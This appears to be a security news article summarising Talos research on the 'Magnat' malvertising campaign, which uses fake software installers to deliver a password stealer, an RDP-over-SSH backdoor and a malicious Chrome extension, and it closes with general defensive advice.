Magnat, a new threat actor, has been detected spreading various sorts of malware, including backdoors, malicious Chrome extensions, and data stealers. In these attacks, two previously undiscovered malware families are frequently distributed together. These new families are thought to have been created by Magnat.
What is the Story?
Talos researchers have identified a malicious activity that targets naïve users by giving bogus installers for popular software.
- This campaign consists of a series of malware distribution campaigns that began in late 2018 and have mostly targeted Canada, as well as the United States, Australia, and a few EU nations.
- In these efforts, two undocumented malware families (a backdoor and a Google Chrome extension) are always deployed together.
- These new families are most likely the work of an anonymous actor known only as “magnat,” who has been constantly expanding and upgrading them.
- Financial gain from the sale of stolen credentials, fraudulent transactions, and Remote Desktop access to systems appear to be the attacker’s motives.
Talos recently discovered a malware distribution effort that seeks to dupe users into installing fraudulent versions of popular applications on their computers. We suspect that web advertising is used to target potential victims looking for software to install on their computers. The combination of advertising and bogus software installers is particularly challenging, because the people who are approached by the adverts are already inclined to run an installer.
- The attackers deliver multiple malware in distribution campaigns that began in late 2018 and mostly targeted Canada, facing around 50% of total infections, followed by Australia, the U.S., and some EU countries.
- The attackers’ motive behind the attack is financial gain by selling stolen credentials, fraudulent transactions, and remote desktop access to systems.
- The campaign uses malvertising as an initial vector to target users interested in downloading popular software.
How can one detect Magnat?
Talos observed that the online advertising is a medium that tries to trick users frequently executing fake software installer. It is trickier to detect when one faces the combination of fake software installer and advertising. Here the user gets involved in the ads which are already predisposed for installer to execute on their system.
After the fake installer is run, three pieces of malware are executed on the victim’s machine:
- All credentials on the system are collected by the password stealer.
- Through a stealthy Microsoft Remote Desktop session, the backdoor opens up systems even when behind a firewall by forwarding the RDP port through an SSH tunnel.
- Several information-stealing features are included in this malicious browser extension, including key logging and screenshots.
Individuals and companies have long been at risk from password stealers. Frequently, compromised accounts are sold on underground forums and can lead to additional compromises via reuse of passwords and stolen accounts. This risk is increased by the chrome extension because it enables the theft of credentials that may not be stored in the system. In addition, the use of an SSH tunnel to forward RDP to an external server provides attackers with a very reliable method of logging into a system remotely.
Enterprises are at risk from Magnat as it delivers multiple payloads. Threats of this nature are sophisticated and require multiple layers of security measures, such as cyber security awareness sessions, network filtering, and endpoint protection, among others.